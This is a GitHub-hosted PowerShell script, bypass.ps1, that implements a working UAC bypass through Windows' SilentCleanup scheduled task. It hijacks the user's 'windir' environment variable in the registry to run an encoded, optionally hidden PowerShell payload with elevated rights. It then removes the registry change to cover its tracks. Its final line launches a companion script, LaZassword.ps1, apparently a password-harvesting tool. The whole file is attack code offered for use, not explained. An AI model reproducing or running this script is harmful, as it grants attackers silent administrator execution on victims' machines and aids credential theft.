-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathbypass.ps1
110 lines (92 loc) · 4.14 KB
/
bypass.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
#######################################################
# NO CONFIGURATION NEEDED #
#######################################################
# Create function "Invoke-TaskCleanerBypass"
function Invoke-TaskCleanerBypass {
[CmdletBinding()]
Param(
[Parameter(Mandatory=$true,Position=0)]
[ValidateSet("Encoded","File")]
[string]$Method,
[Parameter(Mandatory=$false)]
[switch]$Hide
)
DynamicParam {
if($Method -eq "File") {
$paramname = "FileName"
} else {
$paramname = "EncodedCommand"
}
#create a new ParameterAttribute Object
$MethodAttribute = New-Object System.Management.Automation.ParameterAttribute
#$testaddAttribute.Position = 3
$MethodAttribute.Mandatory = $true
#$MethodAttribute.HelpMessage = "My test help message"
#create an attributecollection object for the attribute we just created.
$attributeCollection = new-object System.Collections.ObjectModel.Collection[System.Attribute]
#add our custom attribute
$attributeCollection.Add($MethodAttribute)
#add our paramater specifying the attribute collection
$MethodParam = New-Object System.Management.Automation.RuntimeDefinedParameter($paramname, [string], $attributeCollection)
#expose the name of our parameter
$paramDictionary = New-Object System.Management.Automation.RuntimeDefinedParameterDictionary
$paramDictionary.Add($paramname, $MethodParam)
return $paramDictionary
}
Process {
#If not in the Administrators group, do not run.
$userToFind = $args[0]
$administratorsAccount = Get-WmiObject Win32_Group -filter "LocalAccount=True AND SID='S-1-5-32-544'"
$administratorQuery = "GroupComponent = `"Win32_Group.Domain='" + $administratorsAccount.Domain + "',NAME='" + $administratorsAccount.Name + "'`""
$adminusers = Get-WmiObject Win32_GroupUser -filter $administratorQuery | select PartComponent |where {$_ -match $userToFind}
if(!($adminusers -match $env:username)) {
Return
}
#If not Windows 8.1 or higher then exit.
$OSV = (gwmi -class win32_operatingsystem -Property Version).Version -split "\."
if(!(($OSV[0] -ge 10) -or ($OSV[0] -eq 6 -and $OSV[1] -eq 3))){
Return
}
#Set Variables
if($Method -eq "File") {
$File = $PSBoundParameters.Filename
Try {
$File = (Resolve-Path $File).Path
} catch {
Return
}
} else {
$EncodedCommand = $PSBoundParameters.EncodedCommand
}
$regpath = "HKCU:\Environment"
$key = "windir"
$taskrunner = "schtasks"
$taskparam = "/run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I"
$waittime = 5
$cmd = "powershell "
if($Hide) {
$cmdparams = "/Noni /NoP /W h /E "
} else {
$cmdparams = "/Noni /NoP /E "
}
if($Method -eq "File") {
$tmpsc = "iex (gc -path `"$File`" -Raw)"
$encode = [System.Convert]::ToBase64String(([System.Text.Encoding]::Unicode.GetBytes($tmpsc)))
$cmdparams += "`"$encode`""
} else {
$cmdparams += "`"$encodedcommand`""
}
if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator') -or (([Environment]::UserName).ToLower() -eq "system")) {
Start-Process ($cmd.Trim()) -ArgumentList $cmdparams
} else {
Set-ItemProperty -Path $regpath -Name $key -Value ("cmd /c" + $cmd + $cmdparams + "& ::")
Start-Process $taskrunner -ArgumentList $taskparam
Start-Sleep -s $waittime
Remove-ItemProperty -Path $regpath -Name $key -Force | Out-Null
}
}
}
# Define variable for the current directory
$currentdir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition)
# Execute LaZassword.ps1 as admin
Invoke-TaskCleanerBypass -Method File -Filename $currentdir\LaZassword.ps1 -hide